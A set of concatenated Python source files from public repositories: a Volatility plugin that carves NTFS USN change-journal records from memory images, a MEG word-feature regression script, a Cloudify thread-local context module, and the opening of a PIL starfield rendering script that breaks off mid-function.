# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Csaba Barta
@license: GNU General Public License 2.0
@contact: csaba.barta@gmail.com
"""
# Information for this script taken from the following blog-post by Sebastian Nerz
# http://www.propheciesintothepast.name/2014/03/10/usnjrnlj/
import volatility.plugins.common as common
import volatility.scan as scan
import volatility.utils as utils
import volatility.addrspace as addrspace
import volatility.obj as obj
import struct
import binascii
import re
import volatility.constants
import csv
import sys
# USN_RECORD ReasonCode bit flags -> human readable description.
# NOTE(review): 0x00000001 and 0x00000010 carry the same description here;
# per the Windows USN_RECORD documentation 0x01 is DATA_OVERWRITE and 0x10
# is NAMED_DATA_OVERWRITE -- verify before relying on the text.
REASONSCODES = {
    0x00000001: 'Data in one or more named data streams for the file was overwritten.',
    0x00000002: 'The file or directory was added to.',
    0x00000004: 'The file or directory was truncated.',
    0x00000010: 'Data in one or more named data streams for the file was overwritten.',
    0x00000020: 'One or more named data streams for the file were added to.',
    0x00000040: 'One or more named data streams for the file was truncated.',
    0x00000100: 'The file or directory was created for the first time.',
    0x00000200: 'The file or directory was deleted.',
    0x00000400: "The user made a change to the file's or directory's extended attributes. These NTFS attributes are not accessible to Windows-based applications.",
    0x00000800: 'A change was made in the access rights to the file or directory.',
    0x00001000: 'The file or directory was renamed, and the file name in this structure is the previous name.',
    0x00002000: 'The file or directory was renamed, and the file name in this structure is the new name.',
    0x00004000: 'A user changed the FILE_ATTRIBUTE_NOT_CONTENT_INDEXED attribute. That is, the user changed the file or directory from one that can be content indexed to one that cannot, or vice versa.',
    0x00008000: 'A user has either changed one or more file or directory attributes or one or more time stamps.',
    0x00010000: 'An NTFS hard link was added to or removed from the file or directory',
    0x00020000: 'The compression state of the file or directory was changed from or to compressed.',
    0x00040000: 'The file or directory was encrypted or decrypted.',
    0x00080000: 'The object identifier of the file or directory was changed.',
    0x00100000: 'The reparse point contained in the file or directory was changed, or a reparse point was added to or deleted from the file or directory.',
    0x00200000: 'A named stream has been added to or removed from the file, or a named stream has been renamed.',
    0x80000000: 'The file or directory was closed.',
}

# USN_RECORD SourceInfo bit flags -> symbolic name.
SOURCES = {
    0x00000002 : 'USN_SOURCE_AUXILIARY_DATA',
    0x00000001 : 'USN_SOURCE_DATA_MANAGEMENT',
    0x00000004 : 'USN_SOURCE_REPLICATION_MANAGEMENT'
}

# FILE_ATTRIBUTE_* bit flags -> symbolic name.
ATTRIBUTES = {
    1:'FILE_ATTRIBUTE_READONLY',
    2:'FILE_ATTRIBUTE_HIDDEN',
    4:'FILE_ATTRIBUTE_SYSTEM',
    16:'FILE_ATTRIBUTE_DIRECTORY',
    32:'FILE_ATTRIBUTE_ARCHIVE',
    64:'FILE_ATTRIBUTE_DEVICE',
    128:'FILE_ATTRIBUTE_NORMAL',
    256:'FILE_ATTRIBUTE_TEMPORARY',
    512:'FILE_ATTRIBUTE_SPARSE_FILE',
    1024:'FILE_ATTRIBUTE_REPARSE_POINT',
    2048:'FILE_ATTRIBUTE_COMPRESSED',
    4096:'FILE_ATTRIBUTE_OFFLINE',
    8192:'FILE_ATTRIBUTE_NOT_CONTENT_INDEXED',
    16384:'FILE_ATTRIBUTE_ENCRYPTED',
    65536:'FILE_ATTRIBUTE_VIRTUAL'
}

# Volatility vtype definitions for the on-disk USN_RECORD_V2 layout
# (offsets in bytes from the start of the record).
USN_RECORDS = {
    'FILE_REFERENCE': [ None, {
        'RecordNumberLow' : [0x00, ['unsigned long']],
        'RecordNumberHigh': [0x04, ['unsigned short']],
        'SequenceNumber' : [0x06, ['unsigned short']]
    }],
    'USN_RECORD_V2': [ None, {
        'RecordLength': [0x00, ['unsigned int']],
        'MajorVersion': [0x04, ['unsigned short']],
        'MinorVersion': [0x06, ['unsigned short']],
        'FileReferenceNumber': [0x08, ['FILE_REFERENCE']],
        'ParentFileReferenceNumber': [0x10, ['FILE_REFERENCE']],
        'USN': [0x18, ['unsigned long long']],
        'TimeStamp': [0x20, ['WinTimeStamp', dict(is_utc = True)]],
        'ReasonCode': [0x28, ['unsigned int']],
        'SourceInfo': [0x2B, ['unsigned int']],
        'SecurityId': [0x30, ['unsigned int']],
        'FileAttributes': [0x34, ['unsigned int']],
        'FileNameLength': [0x38, ['unsigned short']],
        'FileNameOffset': [0x3A, ['unsigned short']],
        'FileName': [0x3C, ['String', dict(encoding='utf16', length = lambda x: x.FileNameLength)]]
    }]
}
class FILE_REFERENCE(obj.CType):
    """NTFS file reference: a 48-bit MFT record number split into low/high
    parts plus a 16-bit sequence number (see the vtype above)."""
    @property
    def RecordNumber(self):
        # recombine the split low/high halves into the full record number
        high = self.RecordNumberHigh << 32
        return self.RecordNumberLow | high
class USN_RECORD_V2(obj.CType):
    """Parsed USN change-journal record (layout in the USN_RECORDS vtypes)."""
    # NOTE(review): these class-level values are shadowed by the same-named
    # properties defined further down, so they are effectively dead.
    Attributes = []
    AttributeList = u""

    def __init__(self, theType, offset, vm, name = None, members = None, struct_size = 0, **kwargs):
        obj.CType.__init__(self, theType, offset, vm, name, members, struct_size, **kwargs)

    @property
    def Reasons(self):
        """List of REASONSCODES flag values set in this record's ReasonCode."""
        # Init reasons
        reasons = []
        try:
            reasonkeys = REASONSCODES.keys()
            for k in reasonkeys:
                if k & self.ReasonCode == k:
                    reasons.append(k)
        except Exception as i:
            # carved records may have garbage fields; fail soft
            pass
        return reasons

    @property
    def ReasonList(self):
        """Space-separated human-readable descriptions of the set reasons."""
        # Init reason list
        reasonList = u""
        try:
            for k in self.Reasons:
                if len(reasonList) > 0:
                    reasonList = reasonList + " " + REASONSCODES[k]
                else:
                    reasonList = REASONSCODES[k]
        except Exception as i:
            pass
        return reasonList

    @property
    def Attributes(self):
        """List of ATTRIBUTES flag values set in FileAttributes."""
        # Init attributes
        attributes = []
        try:
            attrkeys = ATTRIBUTES.keys()
            for k in attrkeys:
                if k & self.FileAttributes == k:
                    attributes.append(k)
        except:
            pass
        return attributes

    @property
    def AttributeList(self):
        """Space-separated symbolic names of the set file attributes."""
        # Init attribute list
        attributeList = u""
        try:
            for k in self.Attributes:
                if len(attributeList) > 0:
                    attributeList = attributeList + " " + ATTRIBUTES[k]
                else:
                    attributeList = ATTRIBUTES[k]
        except Exception as i:
            pass
        return attributeList

    @property
    def isValid(self):
        """Heuristic sanity check on carved records: plausible filename
        length and a record length consistent with it."""
        if self.FileNameLength > 0 and \
           self.FileNameLength < 512 and \
           self.RecordLength < (0x3C + self.FileNameLength + 100):
            return True
        else:
            return False

    def __str__(self):
        # tab-separated line used by the default text renderer
        if self.isValid:
            return "{0}\t{1}\t{2}\t{3}\t{4}\t{5}".format(
                str(self.TimeStamp),
                str(self.FileReferenceNumber.RecordNumber),
                str(self.ParentFileReferenceNumber.RecordNumber),
                str(self.USN),
                str(self.FileName.v().decode('utf-16')),
                str(self.ReasonList))
        else:
            print "Corrupt entry"
            return ""

    def csv(self, offset):
        """Return the record's fields as a list for csv.writer, or None
        when the record fails the validity heuristic."""
        if self.isValid:
            return [self.TimeStamp,
                    self.FileReferenceNumber.RecordNumber,
                    self.ParentFileReferenceNumber.RecordNumber,
                    self.USN,
                    self.FileName.v().decode('utf-16').encode('utf-8'),
                    self.FileAttributes,
                    self.AttributeList,
                    self.ReasonCode,
                    self.ReasonList]
        else:
            return None

    def body(self, offset):
        """Render the record in body-file (timeline) format.

        Maps reason flags onto modified/MFT-altered/creation timestamps;
        the record only carries one timestamp, so all derived times equal
        TimeStamp when their flag is present.
        """
        #
        # This output is only experimental
        #
        if not self.isValid:
            return ""
        AccessTime = 0
        ModifiedTime = 0
        MFTAlteredTime = 0
        CreationTime = 0
        for r in self.Reasons:
            if r in [0x01,0x02,0x04,0x10,0x20, 0x40,
                     0x0100, 0x0200, 0x400,
                     0x800, 0x4000, 0x8000, 0x10000,
                     0x100000, 0x200000, 0x80000000]:
                ModifiedTime = self.TimeStamp.v()
            if r in [0x100, 0x200, 0x1000, 0x2000]:
                MFTAlteredTime = self.TimeStamp.v()
            if r in [0x100, 0x200]:
                CreationTime = self.TimeStamp.v()
        AccessTime = self.TimeStamp.v()
        return "0|{0} (Offset: 0x{1:x})|{2}||0|0|0|{3}|{4}|{5}|{6}".format(
            self.FileName.v().decode('utf-16').encode('utf-8'),
            offset,
            self.FileReferenceNumber.RecordNumber,
            AccessTime,
            ModifiedTime,
            MFTAlteredTime,
            CreationTime)
class USN_RECORD(obj.ProfileModification):
    """Profile modification registering the USN vtypes and object classes
    for all Windows profiles."""
    before = ['WindowsObjectClasses']
    conditions = {'os': lambda x: x == 'windows'}
    def modification(self, profile):
        profile.object_classes.update({
            'USN_RECORD_V2' : USN_RECORD_V2,
            'FILE_REFERENCE': FILE_REFERENCE,
        })
        profile.vtypes.update(USN_RECORDS)
class USNScanner(scan.BaseScanner):
    """Address-space scanner that reports offsets where any of the given
    regex needles match (via RegExCheck below)."""
    checks = [ ]
    # overlap pages by the record-header size so records straddling a page
    # boundary are not missed
    overlap = 0x3c
    def __init__(self, needles = None):
        self.needles = needles
        self.checks = [ ("RegExCheck", {'needles':needles})]
        scan.BaseScanner.__init__(self)
    def scan(self, address_space, offset = 0, maxlen = None):
        for offset in scan.BaseScanner.scan(self, address_space, offset, maxlen):
            yield offset
class RegExCheck(scan.ScannerCheck):
    """Scanner check matching any of several regex needles per page.

    Fixes: `regexs` was a class-level list that every instantiation
    appended to, so patterns accumulated across instances (and were
    shared between them); it is now built per instance. The unused local
    compile and the dead `if not self.maxlen` guard (maxlen is always
    0x3c) were removed.
    """

    def __init__(self, address_space, needles = None):
        scan.ScannerCheck.__init__(self, address_space)
        if not needles:
            needles = []
        self.needles = needles
        # fixed USN_RECORD_V2 header size, used as the read-window base
        self.maxlen = 0x3c
        self.regexs = [re.compile(needle) for needle in needles]

    def check(self, offset):
        """Return True when any needle matches at `offset`."""
        usn_buff = self.address_space.read(offset, 0x3c + 256)
        for regex in self.regexs:
            if regex.match(usn_buff) != None:
                return True
        return False

    def skip(self, data, offset):
        """Return how far the scanner may safely jump ahead in `data`:
        to the next potential match, or past the buffer when none."""
        for regex in self.regexs:
            ue = regex.search(data)
            if ue == None:
                return len(data) - offset
            else:
                return ue.start()
class USNJRNL(common.AbstractWindowsCommand):
    """ Scans for and parses potential USNJRNL entries """
    def __init__(self, config, *args, **kwargs):
        common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)
    def calculate(self):
        """Scan physical memory for byte patterns resembling USN_RECORD_V2
        headers; yield (offset, record) pairs that pass the validity check."""
        address_space = utils.load_as(self._config, astype = 'physical')
        # needle: version 2.0 word at +0x04 plus plausible fixed-position
        # filename length/offset bytes
        scanner = USNScanner(needles = ['.{2}\x00\x00\x02\x00\x00\x00.{31}\x01.{17}[\x00\x01]\x3C\x00'])
        usn_entries = []
        #print "Scanning for USNJRNL entries"
        for offset in scanner.scan(address_space):
            # read enough for the header plus the longest accepted filename
            usn_buff = address_space.zread(offset, 0x3c + 1024)
            bufferas = addrspace.BufferAddressSpace(self._config, data = usn_buff)
            usn_entry = obj.Object('USN_RECORD_V2', vm = bufferas,
                                   offset = 0)
            if usn_entry.isValid:
                yield offset, usn_entry
    def render_text(self, outfd, data):
        # one tab-separated line per record (USN_RECORD_V2.__str__)
        for offset, usn_entry in data:
            #print "Offset: " + str(offset)
            print str(usn_entry)
            #print "*" * 80
    def render_body(self, outfd, data):
        # body-file (timeline) output; marked experimental upstream
        print "This output method is only experimental"
        for offset, usn_entry in data:
            print usn_entry.body(offset)
    def render_csv(self, outfd, data):
        w = csv.writer(sys.stdout, dialect='excel', quoting=csv.QUOTE_ALL)
        w.writerow(["TimeStamp", "MFT", "Parent MFT", "USN", "FileName", "Attributes", "AttributeList", "ReasonCode", "ReasonList"])
        for offset, usn_entry in data:
            ue = usn_entry.csv(offset)
            if ue != None:
                w.writerow(ue)
|
csababarta/volatility_plugins
|
usnjrnl.py
|
Python
|
gpl-2.0
| 12,715
|
import scipy
import pickle
import numpy
import sklearn.linear_model
import matplotlib #needed to avoid having to run an X-server just to output to a png
matplotlib.use('Agg') #needed to avoid having to run an X-server just to output to a png
import pylab
import re
def adjustR2(R2, numFeatures, numSamples):
    """Return the adjusted R^2 for a fit with `numFeatures` predictors
    estimated on `numSamples` observations."""
    penalty = (1 - R2) * (float(numFeatures) / (numSamples - numFeatures - 1))
    return R2 - penalty
def mynormalise(A):
    """Z-score `A` column-wise, replacing NaNs (e.g. from zero-variance
    columns) with 0 so downstream regression code does not choke."""
    # explicit submodule import: the file only does `import scipy`, which
    # does not guarantee that scipy.stats is available as an attribute
    import scipy.stats
    A = scipy.stats.zscore(A)
    A[numpy.isnan(A)] = 0
    return A
# --- Load per-word annotations (one row per audiobook token) ---
wordPropsFile = '/home/corpora/original/english/meg_hod_corpus/projects/heartOfDarkness/wordTimesAnnots/hod_JoeTimes_LoadsaFeaturesV3.tab' # best yet! have automatic Stanford tagging, several word length and freq measures, and also the 2 and 3 token back-grams
wordProps = scipy.genfromtxt(wordPropsFile,delimiter='\t',names=True,dtype="i4,f4,f4,S50,S50,i2,i2,i2,S10,f4,f4,f4,f4,f4,f4,f4,f4,f4,f4,f4")

# --- Load epoched MEG data averaged over participants and sensor groups ---
epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/home/corpora/original/english/meg_hod_corpus/usr/data/meg/heartOfDarkness/meanPartsMeanChannelsLeftTempPNPgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#dimensions of original input file: (14595 epochs, 375 channels)
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftTempPNPgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftTempNPNgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftAntTempMagsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanLeftTempMagsGradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))

# Keep only epochs corresponding to actual words (rows with a POS tag).
wordTrials = numpy.array([p != '' for p in wordProps['stanfPOS']])
#epochTimeSelection = range(750) #range(125,625) # -0.5 to +1.5s
# Epoch window geometry: zeroSample is the index of the word onset.
epochStart = -1; # 1s before onset
epochEnd = 2; # 2s after onset
samplingRate = 125
epochSamples = epochedGroupMeanAreasensorsMeanSensors.shape[1]
epochLength = epochEnd-epochStart;
zeroSample = (abs(epochStart)/float(epochLength)*epochSamples)
wordEpochs = epochedGroupMeanAreasensorsMeanSensors[wordTrials]
wordFeatures = wordProps[wordTrials]

# TEMP, make task smaller
wordEpochs = wordEpochs[:]
#wordFeatures =
#wordFeatures[:100]['surprisal2back_COCA']

# Ridge regularisation strengths to search over.
#regParam = [0.001,0.01, 0.1, 1, 10, 1e+2, 1e+3]
regParam = [0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 1e+2, 2e+2, 5e+2, 1e+3, 2e+3, 5e+3]

#epochHistory=0

# Predictor columns drawn from wordFeatures (commented-out ones were
# excluded, several because they duplicate information across epochs).
features = [
 # 'random',
 # 'track',
 # 'sentenceSerial', # will be perfectly correlated with one from previous epoch; see below, first one gets re-introduced
 # 'runSerial',
 # 'storySerial', # is linear combination of track and runserial
 # 'stanfPOS',
 # 'duration',
 # 'lenLett',
 # 'lenPhonCMU',
 # 'lenSyllCMU',
 'logFreq_ANC',
 # 'tokenPrimed',
 # 'tokenPosPrimed',
 'surprisal2back_COCA',
 # 'bigramLogProbBack_COCA',
 # 'trigramLogProbBack_COCA',
 # 'bigramEntropy_COCA_previous', # will be perfectly correlated with one from previous epoch;
 'bigramEntropy_COCA_here',
]
# Short display names for plot legends.
labelMap = {
 'logFreq_ANC': 'freq',
 'surprisal2back_COCA': 'surprisal',
 'bigramEntropy_COCA_here': 'entropy',
 'sentenceSerial': 'position',
}
legendLabels = features

# Build the design matrix: start with a dummy zero row, stack one row per
# feature, then transpose and drop the dummy below.
explanatoryFeatures = numpy.zeros((wordFeatures.shape)) # dummy
#explanatoryFeatures = numpy.array([])
for feature in features:
    if feature == 'duration':
        explanatoryFeatures = numpy.vstack((explanatoryFeatures, wordFeatures['offTime']-wordFeatures['onTime']))
    elif feature == 'random':
        explanatoryFeatures = numpy.vstack((explanatoryFeatures, numpy.random.random((wordFeatures.shape))))
    else:
        explanatoryFeatures = numpy.vstack((explanatoryFeatures, wordFeatures[feature]))
#print '\tlearning semantic dimension',dim,'non-zeros, sum',len(trainY)-sum(trainY==0),sum(trainY), time.ctime()
#explanatoryFeatures[-1,:] = (explanatoryFeatures[-1,:] - numpy.mean(explanatoryFeatures[-1,:]))/numpy.std(explanatoryFeatures[-1,:])
explanatoryFeatures = explanatoryFeatures[1:].T # strip zeros out again
#explanatoryFeatures = explanatoryFeatures.T # strip zeros out again
#features.insert(0,'dummyConstant')
def commonPlotProps():
    """Apply the axis decorations shared by every subplot.

    Relabels the x axis from sample index to seconds relative to word onset
    and restricts the visible window.

    NOTE(review): pylab.show() is invoked *before* the axhline/axvline
    calls, so the reference lines are drawn after display -- this only
    behaves as intended in interactive matplotlib mode; confirm.
    """
    #pylab.plot((0,epochSamples),(0,0),'k--')
    #pylab.ylim((-2.5e-13,2.5e-13)) #((-5e-14,5e-14)) # better way just to get the ones it choose itself?
    #pylab.plot((zeroSample,zeroSample),(0,0.01),'k--')
    # Map 7 evenly spaced sample ticks to seconds: epochStart + sample/rate.
    pylab.xticks(numpy.linspace(0,epochSamples,7),epochStart+(numpy.linspace(0,epochSamples,7)/samplingRate))
    pylab.xlabel('time (s) relative to auditory onset') #+refEvent)
    pylab.xlim((62,313))
    pylab.show()
    # Reference lines at y=0 and at sample 125 (presumably t = 0 -- confirm).
    pylab.axhline(0, color='k', linestyle='--')
    pylab.axvline(125, color='k', linestyle='--')
#if epochsBack > 0:
# historyFeatures = numpy.zeros((explanatoryFeatures.shape[0], explanatoryFeatures.shape[1]*(epochsBack+1)))
# Main experiment: for each history depth, augment the design matrix with
# lagged copies of the features, fit one LassoLars model per time sample,
# and plot fit quality, betas, feature correlations and the ERF.
for epochHistory in [3]: #range(10):
    modelTrainingFit = []
    modelTestCorrelation = []
    modelParameters = []
    legendLabels = features
    tmpFeatures = explanatoryFeatures.copy()
    tmpLegend = legendLabels[:]
    # Append time-lagged copies of every feature (shifted down by
    # epochsBack rows, zero-padded at the top).
    for epochsBack in range(1,epochHistory+1):
        epochFeatures = numpy.zeros(tmpFeatures.shape)
        epochFeatures[epochsBack:,:] = tmpFeatures[:-epochsBack,:]
        explanatoryFeatures = numpy.hstack((explanatoryFeatures,epochFeatures))
        legendLabels = legendLabels + [l+'-'+str(epochsBack) for l in tmpLegend]
    # put in sentence serial - can't leave in history, cos is too highly correlated...
    explanatoryFeatures = numpy.vstack((explanatoryFeatures.T, wordFeatures['sentenceSerial'])).T
    # NOTE(review): features/explanatoryFeatures grow each loop iteration;
    # with more than one epochHistory value this accumulates -- confirm.
    features.append('sentenceSerial')
    legendLabels.append('sentenceSerial')
    #explanatoryFeatures = mynormalise(explanatoryFeatures)
    #pylab.figure(); pylab.imshow(explanatoryFeatures,interpolation='nearest', aspect='auto'); pylab.show()
    #1/0
    # Fit one regression per epoch time point.
    for t in range(epochSamples):
        #print 'fitting at timepoint',t
        # NOTES # tried a load of different versions, and straight linear regression does as well as any of them, measured in terms of R^2
        #lm = sklearn.linear_model.LinearRegression(fit_intercept=True, normalize=True)
        #lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=regParam) #, 10000, 100000])
        lm = sklearn.linear_model.LassoLars(alpha=0.0001) #(alpha=1.0, fit_intercept=True, verbose=False, normalize=True, precompute='auto', max_iter=500, eps=2.2204460492503131e-16, copy_X=True)
        #lm = sklearn.linear_model.Ridge(fit_intercept=True, normalize=True)
        #lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1000000000]) #, 10000, 100000]) # with one test, and 9 explanatory variables, found that got alpha down to .01 for the times when we have a big R^2
        #lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1]) #, 10000, 100000])
        #lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1e-6,1e-4,1e-2,1e+0,1e+2, 1e+4, 1e+6]) #, 10000, 100000])
        #lm = sklearn.linear_model.ElasticNetCV(0.5) # rho (l1/l2 balance) parameter range suggested by doc pages
        #lm = sklearn.linear_model.ElasticNetCV([.1, .5, .7, .9, .95, .99, 1]) # rho (l1/l2 balance) parameter range suggested by doc pages
        # found that ended up taking rho of 1, and zero betas, so trying more L2 biased rho (documentation seems to be contradictory about l1/l2 aka lasso/ridge)
        # Normalise predictors and the single-timepoint response, then fit.
        trainX = mynormalise(explanatoryFeatures)
        trainY = mynormalise(wordEpochs[:,t])
        #trainX = explanatoryFeatures
        #trainY = wordEpochs[:,t]
        trainedLM = lm.fit(trainX,trainY)
        modelParameters.append(lm)
        #guessY = lm.predict(testX)
        #guessTestSemantics[:,dim] = guessY
        # Record adjusted R^2 on the training data (no held-out test here).
        modelTrainingFit.append(adjustR2(lm.score(trainX,trainY), trainX.shape[1], trainX.shape[0]))
        #modelTestCorrelation.append(numpy.corrcoef(guessTestSemantics[:,dim],realTestSemantics[:,dim])[1,0])
        #print '\t\tdone, explaining R^2 of',modelTrainingFit[-1],'reg param',trainedLM.alpha_,'betas',modelParameters[-1].coef_
        #print '\t\tdone, explaining R^2 of',modelTrainingFit[-1],'betas',modelParameters[-1].coef_, lm.alpha_ #'chose reg param of',lm.best_alpha # lm.alphas_[0] # lm.best_alpha for ridge; lm.alphas_[0] for lassolars
        #guessTestSemantics[testTrial,dim] = lm.predict(testX[testTrial,:])
    # Betas: one row per time point, one column per explanatory variable.
    betaMatrix = numpy.array([p.coef_ for p in modelParameters])
    # Map raw feature names (before any '-lag' suffix) through labelMap.
    neatLabels = [l.replace(re.match(r'[^-]+',l).group(0), labelMap[re.match(r'[^-]+',l).group(0)]) for l in legendLabels if re.match(r'[^-]+',l).group(0) in labelMap]
    legendLabels = numpy.array(legendLabels)
    #numFeaturesDisplay = len(legendLabels)
    neatLabels = numpy.array(neatLabels)
    # Four-panel summary figure.
    f = pylab.figure()
    s = pylab.subplot(2,2,1)
    pylab.title('R-squared '+str(trainedLM))
    pylab.plot(modelTrainingFit, linewidth=2)
    commonPlotProps()
    s = pylab.subplot(2,2,2)
    #pylab.plot(betaMatrix, '-', linewidth=2)
    # First 7 betas solid, the rest dashed, to keep the legend readable.
    pylab.plot(betaMatrix[:,:7], '-', linewidth=2)
    pylab.plot(betaMatrix[:,7:], '--', linewidth=2)
    pylab.legend(neatLabels)
    #pylab.legend(legendLabels)
    pylab.title('betas for all (normed) variables')
    commonPlotProps()
    s = pylab.subplot(2,2,3)
    pylab.title('correlations between explanatory variables')
    pylab.imshow(numpy.abs(numpy.corrcoef(explanatoryFeatures.T)),interpolation='nearest', origin='upper') # leave out the dummy one
    pylab.clim(0,1)
    pylab.yticks(range(len(neatLabels)),neatLabels)
    pylab.ylim((-0.5,len(neatLabels)-0.5))
    pylab.xticks(range(len(neatLabels)),neatLabels, rotation=90)
    pylab.xlim((-0.5,len(neatLabels)-0.5))
    pylab.colorbar()
    s = pylab.subplot(2,2,4)
    # Grand-average evoked response across all epochs, for reference.
    pylab.plot(numpy.mean(epochedGroupMeanAreasensorsMeanSensors,axis=0), linewidth=2)
    pylab.title('ERF')
    commonPlotProps()
    pylab.savefig('meg_testfig.png')
    print 'history %d, mean model fit over -0.5s to +1.0s: %.5f, max is %.5f' % (epochHistory, numpy.mean(modelTrainingFit[62:250]), numpy.max(modelTrainingFit[62:250]))
#interestingFeatures = numpy.argsort(numpy.sum(numpy.abs(betaMatrix),axis=0))[::-1][:7]
#interestingBetas = betaMatrix[:,interestingFeatures]
#interestingLabels = legendLabels[interestingFeatures]
#interestingExpFeatures = explanatoryFeatures[:,interestingFeatures]
#f = pylab.figure()
#s = pylab.subplot(2,2,1)
#pylab.title('R-squared '+str(trainedLM))
#pylab.plot(modelTrainingFit)
#commonPlotProps()
#s = pylab.subplot(2,2,2)
#pylab.plot(interestingBetas)
#pylab.legend(interestingLabels)
#pylab.title('betas for %d most interesting normed variables' % len(interestingFeatures))
#commonPlotProps()
#s = pylab.subplot(2,2,3)
#pylab.title('correlations between explanatory variables')
#pylab.imshow(numpy.corrcoef(interestingExpFeatures.T),interpolation='nearest') # leave out the dummy one
#pylab.yticks(range(len(interestingLabels)-1),interestingLabels[1:])
#pylab.ylim((-0.5,len(interestingLabels)-1-0.5))
#pylab.xticks(range(len(interestingLabels)-1),interestingLabels[1:], rotation=90)
#pylab.xlim((-0.5,len(interestingLabels)-1-0.5))
#pylab.colorbar()
#s = pylab.subplot(2,2,4)
#pylab.plot(numpy.mean(epochedGroupMeanAreasensorsMeanSensors,axis=0))
#pylab.title('ERF')
#commonPlotProps()
|
vansky/meg_playground
|
scripts/tileRegressionSeeRSquared_EpochsBack.py
|
Python
|
gpl-2.0
| 11,071
|
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from proxy_tools import proxy
class CtxParameters(dict):
    """Dict of operation parameters that also supports attribute-style access.

    A missing attribute raises KeyError (not AttributeError), mirroring a
    plain dict lookup; callers rely on that exception type.
    """

    def __init__(self, parameters):
        super(CtxParameters, self).__init__(parameters or {})

    def __getattr__(self, attr):
        # dict.__getitem__ raises KeyError(attr) for a missing key, which is
        # exactly what the attribute protocol here is expected to do.
        return self[attr]
class CurrentContext(threading.local):
    """Thread-local holder for the active ctx object and its parameters."""

    def set(self, ctx, parameters=None):
        """Install *ctx* and its parameters for the calling thread."""
        self.ctx = ctx
        self.parameters = CtxParameters(parameters)

    def get_ctx(self):
        return self._get('ctx')

    def get_parameters(self):
        return self._get('parameters')

    def _get(self, attribute):
        # Unset or None both mean "no context in this thread".
        value = getattr(self, attribute, None)
        if value is None:
            raise RuntimeError('No context set in current execution thread')
        return value

    def clear(self):
        """Drop any ctx/parameters installed for the calling thread."""
        for attribute in ('ctx', 'parameters'):
            if hasattr(self, attribute):
                delattr(self, attribute)
# Module-level thread-local holders: one for operation contexts, one for
# workflow contexts. Each thread sees only the values it installed.
current_ctx = CurrentContext()
current_workflow_ctx = CurrentContext()


@proxy
def ctx():
    # Proxy that always resolves to the calling thread's operation ctx
    # (raises RuntimeError when none has been set).
    return current_ctx.get_ctx()


@proxy
def ctx_parameters():
    # Proxy resolving to the calling thread's operation parameters.
    return current_ctx.get_parameters()


@proxy
def workflow_ctx():
    # Proxy resolving to the calling thread's workflow ctx.
    return current_workflow_ctx.get_ctx()


@proxy
def workflow_parameters():
    # Proxy resolving to the calling thread's workflow parameters.
    return current_workflow_ctx.get_parameters()
|
isaac-s/cloudify-plugins-common
|
cloudify/state.py
|
Python
|
apache-2.0
| 2,116
|
from random import random, randint
from PIL import Image, ImageDraw, ImageFont
import perlin
def draw_background(setup) :
    """Render the dark background with ~400 randomly placed star dots.

    Returns a new RGBA image of setup['canvas'] size: a flat fill of the
    'back' color with a translucent white star layer composited on top.
    """
    canvas = setup['canvas']
    image = Image.new('RGBA', canvas, tuple(setup['color']['back']))
    background = Image.new('RGBA', canvas, (0,0,0,0))
    draw = ImageDraw.Draw(background)
    # 400 random (x, y) positions inside the canvas.
    stars = [[ int(p * random()) for p in canvas ] for x in range(400) ]
    # Star radius scales with the smaller canvas dimension (/ 320).
    scale = lambda x, r : x + r * (min(canvas) / 320)
    color = (255, 255, 255, 100)
    for x, y in stars :
        r = random()
        draw.ellipse([x, y, scale(x, r), scale(y, r)], fill=color)
    return Image.alpha_composite(image, background)
def apply_noise(image, setup) :
    """Modulate each non-transparent pixel's RGB with Perlin noise.

    Alpha is preserved; fully transparent pixels are skipped. Returns a new
    image of the same mode/size.
    """
    generator = perlin.Perlin()
    octaves = 5      # NOTE(review): unused -- the OctavePerlin call below hard-codes 1, 5
    persistence = 5  # NOTE(review): unused, see above
    coef = 30        # noise frequency divisor: larger -> smoother noise
    width, height = setup['canvas'][0], setup['canvas'][1]
    list_of_pixels = list(image.getdata())
    for i, pixel in enumerate(list_of_pixels) :
        if pixel != (0, 0, 0, 0) :
            # 2-D noise coordinate derived from the flat pixel index.
            noise = generator.OctavePerlin((i % width) / coef, i / (height * coef), 0, 1, 5)
            # Scale RGB by (1 + noise), keep the original alpha.
            new_pixel = [ int(x * (1 + noise)) for x in pixel[:3] ]
            new_pixel.append(pixel[3])
            list_of_pixels[i] = tuple(new_pixel)
    image = Image.new(image.mode, image.size)
    image.putdata(list_of_pixels)
    return image
def apply_ray_effect(sun_image, setup) :
    """Add a radial light-shaft effect emanating from the canvas center.

    For every output pixel, marches *samples* steps from the pixel toward
    the center, accumulating progressively dimmed colors along the way.
